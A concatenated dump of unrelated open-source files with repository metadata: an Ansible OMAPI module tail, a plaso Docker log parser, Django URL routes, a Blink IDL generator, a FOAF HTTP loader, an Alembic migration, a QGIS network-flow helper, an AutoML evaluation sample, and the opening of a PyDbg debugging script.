(response_obj['name'], self.module.params['hostname']))
"""
# It seems statements are not returned by OMAPI, then we cannot modify them at this moment.
if 'statements' not in response_obj and len(self.module.params['statements']) > 0 or \
response_obj['statements'] != self.module.params['statements']:
with open('/tmp/omapi', 'w') as fb:
for (k,v) in iteritems(response_obj):
fb.writelines('statements: %s %s\n' % (k, v))
"""
if len(fields_to_update) == 0:
self.module.exit_json(changed=False, lease=response_obj)
else:
msg = OmapiMessage.update(host_response.handle)
msg.update_object(fields_to_update)
try:
response = self.omapi.query_server(msg)
if response.opcode != OMAPI_OP_STATUS:
self.module.fail_json(msg="Failed to modify host, ensure authentication and host parameters "
"are valid.")
self.module.exit_json(changed=True)
except OmapiError as e:
self.module.fail_json(msg="OMAPI error: %s" % to_native(e), exception=traceback.format_exc())
def remove_host(self):
try:
self.omapi.del_host(self.module.params['macaddr'])
self.module.exit_json(changed=True)
except OmapiErrorNotFound:
self.module.exit_json()
except OmapiError as e:
self.module.fail_json(msg="OMAPI error: %s" % to_native(e), exception=traceback.format_exc())
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(required=True, type='str', choices=['present', 'absent']),
host=dict(type='str', default="localhost"),
port=dict(type='int', default=7911),
key_name=dict(required=True, type='str', default=None),
key=dict(required=True, type='str', default=None, no_log=True),
macaddr=dict(required=True, type='str', default=None),
hostname=dict(type='str', default=None, aliases=['name']),
ip=dict(type='str', default=None),
ddns=dict(type='bool', default=False),
statements=dict(type='list', default=[])
),
supports_check_mode=False
)
if not pureomapi_found:
module.fail_json(msg="pypureomapi library is required by this module.")
if module.params['key'] is None or len(module.params["key"]) == 0:
module.fail_json(msg="'key' parameter cannot be empty.")
if module.params['key_name'] is None or len(module.params["key_name"]) == 0:
module.fail_json(msg="'key_name' parameter cannot be empty.")
host_manager = OmapiHostManager(module)
try:
if module.params['state'] == 'present':
host_manager.setup_host()
elif module.params['state'] == 'absent':
host_manager.remove_host()
except ValueError as e:
module.fail_json(msg="OMAPI input value error: %s" % to_native(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
| gpl-3.0 | 7,198,465,932,404,070,000 | 36.705696 | 134 | 0.579689 | false |
log2timeline/plaso | plaso/parsers/docker.py | 3 | 12935 | # -*- coding: utf-8 -*-
"""Parser for Docker configuration and log files."""
import codecs
import json
import os
from dfdatetime import semantic_time as dfdatetime_semantic_time
from dfdatetime import time_elements as dfdatetime_time_elements
from dfvfs.helpers import text_file
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.parsers import manager
from plaso.parsers import interface
class DockerJSONContainerLogEventData(events.EventData):
"""Docker container's log event data.
Attributes:
container_id (str): identifier of the container (sha256).
log_line (str): log line.
log_source (str): log source.
"""
DATA_TYPE = 'docker:json:container:log'
def __init__(self):
"""Initializes event data."""
super(DockerJSONContainerLogEventData, self).__init__(
data_type=self.DATA_TYPE)
self.container_id = None
self.log_line = None
self.log_source = None
class DockerJSONContainerEventData(events.EventData):
"""Docker container configuration event data.
Attributes:
action (str): whether the container was created, started, or finished.
container_id (str): identifier of the container (SHA256).
container_name (str): name of the container.
"""
DATA_TYPE = 'docker:json:container'
def __init__(self):
"""Initializes event data."""
super(DockerJSONContainerEventData, self).__init__(data_type=self.DATA_TYPE)
self.container_id = None
self.container_name = None
self.action = None
class DockerJSONLayerEventData(events.EventData):
"""Docker file system layer configuration event data.
Attributes:
command: the command used which made Docker create a new layer.
layer_id: the identifier of the current Docker layer (SHA-1).
"""
DATA_TYPE = 'docker:json:layer'
def __init__(self):
"""Initializes event data."""
super(DockerJSONLayerEventData, self).__init__(data_type=self.DATA_TYPE)
self.command = None
self.layer_id = None
class DockerJSONParser(interface.FileObjectParser):
"""Parser for Docker json configuration and log files.
This handles :
* Per container config file
DOCKER_DIR/containers/<container_id>/config.json
* Per container stdout/stderr output log
DOCKER_DIR/containers/<container_id>/<container_id>-json.log
* Filesystem layer config files
DOCKER_DIR/graph/<layer_id>/json
"""
NAME = 'dockerjson'
DATA_FORMAT = 'Docker configuration and log JSON file'
_ENCODING = 'utf-8'
def _GetIdentifierFromPath(self, parser_mediator):
"""Extracts a container or a graph ID from a JSON file's path.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
Returns:
str: container or graph identifier.
"""
file_entry = parser_mediator.GetFileEntry()
path = file_entry.path_spec.location
file_system = file_entry.GetFileSystem()
path_segments = file_system.SplitPath(path)
return path_segments[-2]
def _ParseLayerConfigJSON(self, parser_mediator, file_object):
"""Extracts events from a Docker filesystem layer configuration file.
The path of each filesystem layer config file is:
DOCKER_DIR/graph/<layer_id>/json
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file is not a valid layer config file.
"""
file_content = file_object.read()
file_content = codecs.decode(file_content, self._ENCODING)
json_dict = json.loads(file_content)
if 'docker_version' not in json_dict:
raise errors.UnableToParseFile(
'not a valid Docker layer configuration file, missing '
'\'docker_version\' key.')
time_string = json_dict.get('created', None)
if time_string is not None:
layer_creation_command_array = [
x.strip() for x in json_dict['container_config']['Cmd']]
layer_creation_command = ' '.join(layer_creation_command_array).replace(
'\t', '')
event_data = DockerJSONLayerEventData()
event_data.command = layer_creation_command
event_data.layer_id = self._GetIdentifierFromPath(parser_mediator)
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse created time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def _ParseContainerConfigJSON(self, parser_mediator, file_object):
"""Extracts events from a Docker container configuration file.
The path of each container config file is:
DOCKER_DIR/containers/<container_id>/config.json
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file is not a valid container config file.
"""
file_content = file_object.read()
file_content = codecs.decode(file_content, self._ENCODING)
json_dict = json.loads(file_content)
if 'Driver' not in json_dict:
raise errors.UnableToParseFile(
'not a valid Docker container configuration file, ' 'missing '
'\'Driver\' key.')
container_id_from_path = self._GetIdentifierFromPath(parser_mediator)
container_id_from_json = json_dict.get('ID', None)
if not container_id_from_json:
raise errors.UnableToParseFile(
          'not a valid Docker container configuration file, the \'ID\' key is '
'missing from the JSON dict (should be {0:s})'.format(
container_id_from_path))
if container_id_from_json != container_id_from_path:
raise errors.UnableToParseFile(
'not a valid Docker container configuration file. The \'ID\' key of '
          'the JSON dict ({0:s}) is different from the container identifier '
          'taken from the path to the JSON file ({1:s}).'.format(
container_id_from_json, container_id_from_path))
if 'Config' in json_dict and 'Hostname' in json_dict['Config']:
container_name = json_dict['Config']['Hostname']
else:
container_name = 'Unknown container name'
event_data = DockerJSONContainerEventData()
event_data.container_id = container_id_from_path
event_data.container_name = container_name
json_state = json_dict.get('State', None)
if json_state is not None:
time_string = json_state.get('StartedAt', None)
if time_string is not None:
event_data.action = 'Container Started'
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse container start time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_START)
parser_mediator.ProduceEventWithEventData(event, event_data)
time_string = json_state.get('FinishedAt', None)
if time_string is not None:
# If the timestamp is 0001-01-01T00:00:00Z, the container
# is still running, so we don't generate a Finished event
if time_string != '0001-01-01T00:00:00Z':
event_data.action = 'Container Finished'
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse container finish time string: {0:s} with '
'error: {1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_END)
parser_mediator.ProduceEventWithEventData(event, event_data)
time_string = json_dict.get('Created', None)
if time_string is not None:
event_data.action = 'Container Created'
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse container created time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def _ParseContainerLogJSON(self, parser_mediator, file_object):
"""Extract events from a Docker container log files.
The format is one JSON formatted log message per line.
The path of each container log file (which logs the container stdout and
stderr) is:
DOCKER_DIR/containers/<container_id>/<container_id>-json.log
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
"""
container_id = self._GetIdentifierFromPath(parser_mediator)
text_file_object = text_file.TextFile(file_object)
for log_line in text_file_object:
json_log_line = json.loads(log_line)
time_string = json_log_line.get('time', None)
if time_string is None:
continue
event_data = DockerJSONContainerLogEventData()
event_data.container_id = container_id
event_data.log_line = json_log_line.get('log', None)
event_data.log_source = json_log_line.get('stream', None)
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse written time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseFileObject(self, parser_mediator, file_object):
"""Parses various Docker configuration and log files in JSON format.
This methods checks whether the file_object points to a docker JSON config
or log file, and calls the corresponding _Parse* function to generate
Events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
ValueError: if the JSON file cannot be decoded.
"""
# Trivial JSON format check: first character must be an open brace.
if file_object.read(1) != b'{':
raise errors.UnableToParseFile(
'is not a valid JSON file, missing opening brace.')
file_object.seek(0, os.SEEK_SET)
file_entry = parser_mediator.GetFileEntry()
file_system = file_entry.GetFileSystem()
json_file_path = parser_mediator.GetDisplayName()
split_path = file_system.SplitPath(json_file_path)
try:
if 'containers' in split_path:
# For our intent, both version of the config file can be parsed
# the same way
if split_path[-1] in ['config.json', 'config.v2.json']:
self._ParseContainerConfigJSON(parser_mediator, file_object)
if json_file_path.endswith('-json.log'):
self._ParseContainerLogJSON(parser_mediator, file_object)
elif 'graph' in split_path:
if 'json' in split_path:
self._ParseLayerConfigJSON(parser_mediator, file_object)
except ValueError as exception:
if exception == 'No JSON object could be decoded':
raise errors.UnableToParseFile(exception)
raise
manager.ParsersManager.RegisterParser(DockerJSONParser)
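
# Illustrative input sample (added for clarity; not part of the original
# module). A single line of a container log handled by
# _ParseContainerLogJSON() looks roughly like this (identifiers and timestamp
# are made up):
#
#     {"log": "hello world\n", "stream": "stdout",
#      "time": "2016-07-14T01:02:03.123456789Z"}
#
# Only the 'log', 'stream' and 'time' keys are read, and 'time' must be an
# ISO 8601 string for the event timestamp to be parsed.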
| apache-2.0 | -6,820,813,953,497,394,000 | 36.063037 | 80 | 0.684345 | false |
lichi6174/django-api-lab | src/blog/urls.py | 1 | 1740 | """blog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from accounts.views import (login_view, register_view, logout_view)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^comments/', include("comments.urls", namespace='comments')),
url(r'^register/', register_view, name='register'),
url(r'^login/', login_view, name='login'),
url(r'^logout/', logout_view, name='logout'),
url(r'^', include("posts.urls", namespace='posts')),
url(r'^api/posts/', include("posts.api.urls", namespace='posts-api')),
url(r'^api/comments/', include("comments.api.urls", namespace='comments-api')),
url(r'^api/users/', include("accounts.api.urls", namespace='users-api')),
#url(r'^posts/$', "<appname>.views.<function_name>"),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | mit | 4,748,679,259,774,233,000 | 41.463415 | 83 | 0.69023 | false |
ondra-novak/blink | Source/bindings/scripts/generate_global_constructors.py | 15 | 8212 | #!/usr/bin/python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates interface properties on global objects.
Concretely these are implemented as "constructor attributes", meaning
"attributes whose name ends with Constructor" (special-cased by code generator),
hence "global constructors" for short.
For reference on global objects, see:
http://heycam.github.io/webidl/#Global
http://heycam.github.io/webidl/#Exposed
Design document: http://www.chromium.org/developers/design-documents/idl-build
"""
import itertools
import optparse
import os
import cPickle as pickle
import re
import sys
from collections import defaultdict
from utilities import get_file_contents, idl_filename_to_interface_name, read_file_to_list, write_file, get_interface_extended_attributes_from_idl, is_callback_interface_from_idl
interface_name_to_global_names = {}
global_name_to_constructors = defaultdict(list)
HEADER_FORMAT = """// Stub header file for {{idl_basename}}
// Required because the IDL compiler assumes that a corresponding header file
// exists for each IDL file.
"""
def parse_options():
parser = optparse.OptionParser()
parser.add_option('--idl-files-list', help='file listing IDL files')
parser.add_option('--global-objects-file', help='pickle file of global objects')
parser.add_option('--write-file-only-if-changed', type='int', help='if true, do not write an output file if it would be identical to the existing one, which avoids unnecessary rebuilds in ninja')
options, args = parser.parse_args()
if options.idl_files_list is None:
parser.error('Must specify a file listing IDL files using --idl-files-list.')
if options.global_objects_file is None:
parser.error('Must specify a pickle file of global objects using --global-objects-file.')
if options.write_file_only_if_changed is None:
parser.error('Must specify whether output files are only written if changed using --write-file-only-if-changed.')
options.write_file_only_if_changed = bool(options.write_file_only_if_changed)
return options, args
def flatten_list(iterable):
return list(itertools.chain.from_iterable(iterable))
def interface_name_to_constructors(interface_name):
"""Returns constructors for an interface."""
global_names = interface_name_to_global_names[interface_name]
return flatten_list(global_name_to_constructors[global_name]
for global_name in global_names)
def record_global_constructors(idl_filename):
interface_name = idl_filename_to_interface_name(idl_filename)
full_path = os.path.realpath(idl_filename)
idl_file_contents = get_file_contents(full_path)
extended_attributes = get_interface_extended_attributes_from_idl(idl_file_contents)
# An interface property is produced for every non-callback interface
# that does not have [NoInterfaceObject].
# Callback interfaces with constants also have interface properties,
# but there are none of these in Blink.
# http://heycam.github.io/webidl/#es-interfaces
if (is_callback_interface_from_idl(idl_file_contents) or
'NoInterfaceObject' in extended_attributes):
return
# The [Exposed] extended attribute MUST take an identifier list. Each
# identifier in the list MUST be a global name. An interface or interface
# member the extended attribute applies to will be exposed only on objects
# associated with ECMAScript global environments whose global object
# implements an interface that has a matching global name.
exposed_global_names = extended_attributes.get('Exposed', 'Window').strip('()').split(',')
new_constructors_list = generate_global_constructors_list(interface_name, extended_attributes)
for exposed_global_name in exposed_global_names:
global_name_to_constructors[exposed_global_name].extend(new_constructors_list)
def generate_global_constructors_list(interface_name, extended_attributes):
extended_attributes_list = [
name + '=' + extended_attributes[name]
for name in 'Conditional', 'PerContextEnabled', 'RuntimeEnabled'
if name in extended_attributes]
if extended_attributes_list:
extended_string = '[%s] ' % ', '.join(extended_attributes_list)
else:
extended_string = ''
attribute_string = 'attribute {interface_name}Constructor {interface_name}'.format(interface_name=interface_name)
attributes_list = [extended_string + attribute_string]
# In addition to the usual interface property, for every [NamedConstructor]
# extended attribute on an interface, a corresponding property MUST exist
# on the ECMAScript global object.
# http://heycam.github.io/webidl/#NamedConstructor
if 'NamedConstructor' in extended_attributes:
named_constructor = extended_attributes['NamedConstructor']
# Extract function name, namely everything before opening '('
constructor_name = re.sub(r'\(.*', '', named_constructor)
# Note the reduplicated 'ConstructorConstructor'
# FIXME: rename to NamedConstructor
attribute_string = 'attribute %sConstructorConstructor %s' % (interface_name, constructor_name)
attributes_list.append(extended_string + attribute_string)
return attributes_list
def write_global_constructors_partial_interface(interface_name, idl_filename, constructor_attributes_list, only_if_changed):
# FIXME: replace this with a simple Jinja template
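    # The generated IDL has the form:
    #   partial interface Window {
    #       attribute FooConstructor Foo;
    #   };
    # with one attribute line per constructor.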
lines = (['partial interface %s {\n' % interface_name] +
[' %s;\n' % constructor_attribute
# FIXME: sort by interface name (not first by extended attributes)
for constructor_attribute in sorted(constructor_attributes_list)] +
['};\n'])
write_file(''.join(lines), idl_filename, only_if_changed)
header_filename = os.path.splitext(idl_filename)[0] + '.h'
idl_basename = os.path.basename(idl_filename)
write_file(HEADER_FORMAT.format(idl_basename=idl_basename),
header_filename, only_if_changed)
################################################################################
def main():
options, args = parse_options()
# Input IDL files are passed in a file, due to OS command line length
# limits. This is generated at GYP time, which is ok b/c files are static.
idl_files = read_file_to_list(options.idl_files_list)
# Output IDL files (to generate) are passed at the command line, since
# these are in the build directory, which is determined at build time, not
# GYP time.
# These are passed as pairs of GlobalObjectName, GlobalObject.idl
interface_name_idl_filename = [(args[i], args[i + 1])
for i in range(0, len(args), 2)]
with open(options.global_objects_file) as global_objects_file:
interface_name_to_global_names.update(pickle.load(global_objects_file))
for idl_filename in idl_files:
record_global_constructors(idl_filename)
# Check for [Exposed] / [Global] mismatch.
known_global_names = frozenset(itertools.chain.from_iterable(interface_name_to_global_names.values()))
exposed_global_names = frozenset(global_name_to_constructors)
if not exposed_global_names.issubset(known_global_names):
unknown_global_names = exposed_global_names.difference(known_global_names)
raise ValueError('The following global names were used in '
'[Exposed=xxx] but do not match any [Global] / '
'[PrimaryGlobal] interface: %s'
% list(unknown_global_names))
# Write partial interfaces containing constructor attributes for each
# global interface.
for interface_name, idl_filename in interface_name_idl_filename:
constructors = interface_name_to_constructors(interface_name)
write_global_constructors_partial_interface(
interface_name,
idl_filename,
constructors,
options.write_file_only_if_changed)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 6,122,160,803,430,949,000 | 44.120879 | 199 | 0.700073 | false |
mborho/foafer | rdf/http.py | 1 | 3345 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# FOAFer
# Copyright (C) 2003, 2010, Martin Borho <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import re
from google.appengine.api import urlfetch
class http(object):
def __init__(self,uri=None):
self.user_agent = 'FOAFer.org'
self.detected = None
self.uri = uri
self.errors = []
pass
def load(self,uri=None):
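        # Fetch the document at uri (or the previously stored self.uri) with
        # urlfetch and return the raw RDF, or None with self.errors populated
        # when it cannot be retrieved or does not look like a FOAF file.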
rdf = None
if uri is not None:
self.uri = uri
if self.uri:
self.uri = re.sub(r'#.*$','',self.uri)
try:
headers = {'Cache-Control' : 'max-age=10','User-Agent': self.user_agent}
result = urlfetch.fetch(self.uri, headers = headers)#,'Accept':'application/rdf+xml'})
if result.status_code in [200,302,301]:
rdf = result.content
if not self.checkRDF(rdf):
self.errors.append('No Foaf-File found.')
return None
elif result.status_code in [404]:
self.errors.append('Response Code 404 - Document Not Found.')
else:
self.errors.append('File was not found.')
                self.errors.append('Return Code: %d' % result.status_code)
except urlfetch.InvalidURLError,e:
self.errors.append("Invalid URL, only http and https is supported")
except urlfetch.DownloadError,e:
self.errors.append(unicode(e))
except urlfetch.ResponseTooLargeError,e:
self.errors.append("The response data exceeded the maximum allowed size.")
except Exception, e:
self.errors.append('%s: %s' % (e.__class__.__name__, e))
else:
self.errors.append('no uri given')
return rdf
def checkRDF(self,rdf):
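        # Heuristic FOAF check: accept the document only if it is not an HTML
        # page and references the FOAF namespace; otherwise try to auto-detect
        # a FOAF document advertised via a <link rel="meta"> tag.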
rdf = re.sub(r'\s',' ', rdf)
pat = re.compile('<html.*<head',re.I)
if not pat.search(rdf) and re.search(r'http://xmlns.com/foaf/',rdf):
return True
else:
self.checkLink(rdf)
return False
def checkLink(self, string):
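        # Scan for <link rel="meta"> tags mentioning FOAF and remember the
        # first absolute href as the auto-detected FOAF location.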
pat = re.compile(r'<link[^>]*rel=\"meta\"[^>]*>',re.I)
links = pat.findall(string)
links = [l for l in links if re.search(r'foaf',l,re.I) is not None]
if len(links) > 0:
pat = re.compile(r'href="([^"]*)"',re.I)
foaf = pat.findall(links[0])
if foaf and foaf[0].startswith('http'):
self.detected = foaf[0]
return True
else:
return False
| agpl-3.0 | 1,553,628,472,759,499,800 | 37.895349 | 102 | 0.553064 | false |
gigglearrows/anniesbot | alembic/versions/514f4b9bc74_added_columns_for_duel_win_lose_streaks_.py | 1 | 1069 | """Added columns for duel win/lose streaks in the tb_user_duel_stats table
Revision ID: 514f4b9bc74
Revises: 1d6dbeb93c9
Create Date: 2015-12-22 00:17:51.509756
"""
# revision identifiers, used by Alembic.
revision = '514f4b9bc74'
down_revision = '1d6dbeb93c9'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('tb_user_duel_stats', sa.Column('current_streak', sa.Integer(), nullable=False))
op.add_column('tb_user_duel_stats', sa.Column('longest_losestreak', sa.Integer(), nullable=False))
op.add_column('tb_user_duel_stats', sa.Column('longest_winstreak', sa.Integer(), nullable=False))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tb_user_duel_stats', 'longest_winstreak')
op.drop_column('tb_user_duel_stats', 'longest_losestreak')
op.drop_column('tb_user_duel_stats', 'current_streak')
### end Alembic commands ###
| mit | 5,059,715,069,040,605,000 | 32.40625 | 102 | 0.703461 | false |
stevenmizuno/QGIS | python/plugins/processing/algs/grass7/ext/v_net_flow.py | 5 | 2124 | # -*- coding: utf-8 -*-
"""
***************************************************************************
v_net_flow.py
---------------------
Date : December 2015
Copyright : (C) 2015 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'December 2015'
__copyright__ = '(C) 2015, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from .v_net import incorporatePoints, variableOutput
def checkParameterValuesBeforeExecuting(alg, parameters, context):
""" Verify if we have the right parameters """
params = [u'where', u'cats']
values = []
for param in params:
for i in [u'source', u'sink']:
values.append(
alg.parameterAsString(
parameters,
'{}_{}'.format(i, param),
context
)
)
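    # values is ordered [source_where, sink_where, source_cats, sink_cats];
    # at least one source selector and one sink selector must be provided.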
if (values[0] or values[2]) and (values[1] or values[3]):
return None
return alg.tr("You need to set at least source/sink_where or source/sink_cats parameters for each set!")
def processCommand(alg, parameters, context):
incorporatePoints(alg, parameters, context)
def processOutputs(alg, parameters, context):
outputParameter = {'output': ['output', 'line', 1, True],
'cut': ['cut', 'line', 1, True]}
variableOutput(alg, outputParameter, parameters, context)
| gpl-2.0 | 4,885,700,446,181,923,000 | 34.898305 | 108 | 0.474032 | false |
googleapis/python-automl | samples/snippets/get_model_evaluation.py | 1 | 3697 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def get_model_evaluation(project_id, model_id, model_evaluation_id):
"""Get model evaluation."""
# [START automl_language_entity_extraction_get_model_evaluation]
# [START automl_language_sentiment_analysis_get_model_evaluation]
# [START automl_language_text_classification_get_model_evaluation]
# [START automl_translate_get_model_evaluation]
# [START automl_vision_classification_get_model_evaluation]
# [START automl_vision_object_detection_get_model_evaluation]
from google.cloud import automl
# TODO(developer): Uncomment and set the following variables
# project_id = "YOUR_PROJECT_ID"
# model_id = "YOUR_MODEL_ID"
# model_evaluation_id = "YOUR_MODEL_EVALUATION_ID"
client = automl.AutoMlClient()
# Get the full path of the model evaluation.
model_path = client.model_path(project_id, "us-central1", model_id)
model_evaluation_full_id = f"{model_path}/modelEvaluations/{model_evaluation_id}"
# Get complete detail of the model evaluation.
response = client.get_model_evaluation(name=model_evaluation_full_id)
print("Model evaluation name: {}".format(response.name))
print("Model annotation spec id: {}".format(response.annotation_spec_id))
print("Create Time: {}".format(response.create_time))
print("Evaluation example count: {}".format(response.evaluated_example_count))
# [END automl_language_sentiment_analysis_get_model_evaluation]
# [END automl_language_text_classification_get_model_evaluation]
# [END automl_translate_get_model_evaluation]
# [END automl_vision_classification_get_model_evaluation]
# [END automl_vision_object_detection_get_model_evaluation]
print(
"Entity extraction model evaluation metrics: {}".format(
response.text_extraction_evaluation_metrics
)
)
# [END automl_language_entity_extraction_get_model_evaluation]
# [START automl_language_sentiment_analysis_get_model_evaluation]
print(
"Sentiment analysis model evaluation metrics: {}".format(
response.text_sentiment_evaluation_metrics
)
)
# [END automl_language_sentiment_analysis_get_model_evaluation]
# [START automl_language_text_classification_get_model_evaluation]
# [START automl_vision_classification_get_model_evaluation]
print(
"Classification model evaluation metrics: {}".format(
response.classification_evaluation_metrics
)
)
# [END automl_language_text_classification_get_model_evaluation]
# [END automl_vision_classification_get_model_evaluation]
# [START automl_translate_get_model_evaluation]
print(
"Translation model evaluation metrics: {}".format(
response.translation_evaluation_metrics
)
)
# [END automl_translate_get_model_evaluation]
# [START automl_vision_object_detection_get_model_evaluation]
print(
"Object detection model evaluation metrics: {}".format(
response.image_object_detection_evaluation_metrics
)
)
# [END automl_vision_object_detection_get_model_evaluation]
| apache-2.0 | -7,284,008,452,598,232,000 | 41.494253 | 85 | 0.711929 | false |
phracek/rebase-helper | rebasehelper/__init__.py | 1 | 1129 | # -*- coding: utf-8 -*-
#
# This tool helps you to rebase package to the latest version
# Copyright (C) 2013-2014 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hracek <[email protected]>
# Tomas Hozza <[email protected]>
import os
import pkg_resources
# make entry points accessible in case this package is not installed
parent_dir = os.path.dirname(os.path.dirname(__file__))
pkg_resources.working_set.add_entry(parent_dir)
| gpl-2.0 | 5,605,196,220,216,150,000 | 37.931034 | 73 | 0.750221 | false |
Alwnikrotikz/paimei | debuggee_procedure_call.py | 1 | 11874 | #!c:\python\python.exe
#
# PyDbg Debuggee Procedure Call Hack
# Copyright (C) 2006 Pedram Amini <[email protected]>
#
# $Id$
#
# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
'''
@author: Pedram Amini
@license: GNU General Public License 2.0 or later
@contact: [email protected]
@organization: www.openrce.org
'''
import sys
import struct
import utils
from pydbg import *
from pydbg.defines import *
class __global:
def __repr__ (self):
rep = ""
for key, val in self.__dict__.items():
if type(val) is int:
rep += " %s: 0x%08x, %d\n" % (key, val, val)
else:
rep += " %s: %s\n" % (key, val)
return rep
allocations = [] # allocated (address, size) tuples.
cmd_num = 0 # keep track of executed commands.
glob = __global() # provide the user with a globally accessible persistent storage space.
saved_context = None # saved thread context prior to CALL insertion.
dbg = pydbg() # globally accessible pydbg instance.
container = None # address of memory allocated for instruction container.
# enable / disable logging here.
#log = lambda x: sys.stdout.write("> " + x + "\n")
log = lambda x: None
########################################################################################################################
def alloc (size):
'''
    Convenience wrapper around pydbg.virtual_alloc() for easy allocation of read/write/execute memory. This routine
    maintains the global "allocations" table.
    @type size: Long
